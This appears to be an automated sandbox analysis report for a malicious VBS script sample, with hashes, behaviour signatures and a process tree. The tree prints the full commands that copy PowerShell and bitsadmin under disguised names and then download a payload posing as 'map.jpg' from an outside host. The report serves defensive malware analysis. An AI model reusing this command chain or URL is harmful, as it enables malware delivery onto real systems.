Analysis
-
max time kernel
158s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
24-03-2022 23:27
Static task
static1
Behavioral task
behavioral1
Sample
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
Resource
win7-20220311-en
General
-
Target
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs
-
Size
6KB
-
MD5
d7c45aaa2ec4c379c3590e85efd3e27c
-
SHA1
182d0dd1d7e8c4797b70550c1fa26d20e691df37
-
SHA256
5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c
-
SHA512
b832b5d84d581d7bc9282cdcce3752d8423e0967a786c9c54601c270e9743267d57c0de68c0e5c97f51af3d1be040b341dc04f50e12c3e6700eb11282910c217
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
ZAblYWBin.exepid process 3540 ZAblYWBin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 4532 wrote to memory of 1664 4532 WScript.exe cmd.exe PID 4532 wrote to memory of 1664 4532 WScript.exe cmd.exe PID 1664 wrote to memory of 4580 1664 cmd.exe cmd.exe PID 1664 wrote to memory of 4580 1664 cmd.exe cmd.exe PID 1664 wrote to memory of 4524 1664 cmd.exe cmd.exe PID 1664 wrote to memory of 4524 1664 cmd.exe cmd.exe PID 4532 wrote to memory of 3540 4532 WScript.exe ZAblYWBin.exe PID 4532 wrote to memory of 3540 4532 WScript.exe ZAblYWBin.exe PID 4532 wrote to memory of 3540 4532 WScript.exe ZAblYWBin.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d992840fc8ab8dc4560ac6c9ba57f5e2770ecb1178956082f3848b84380950c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe & cmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\cmd.execmd /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\zDygeqh.exe3⤵PID:4580
-
-
C:\Windows\system32\cmd.execmd /c copy /Y /Z c:\Windows\SysWOW64\bi*.exe C:\ProgramData\ZAblYWB*.exe3⤵PID:4524
-
-
-
C:\ProgramData\ZAblYWBin.exe"C:\ProgramData\ZAblYWBin.exe" /transfer bHfBoa /download https://waybackwhenbycynthia.com/edikaso/09518900965/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg2⤵
- Executes dropped EXE
PID:3540
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a
-
MD5
f57a03fa0e654b393bb078d1c60695f3
SHA11ced6636bd2462c0f1b64775e1981d22ae57af0b
SHA256c93b7734470cf96c5170f7b21f361cdf3f74ca819626c83c4b8a68210deeb35c
SHA5127e84dd9a3e29523d25c0927424261ced908191e3151c9802b61fa3c5fe13d1192d19996cb435bb6d9be5731b8370e8ffb6ad26a4ba0733e212a103eb0bd75a2a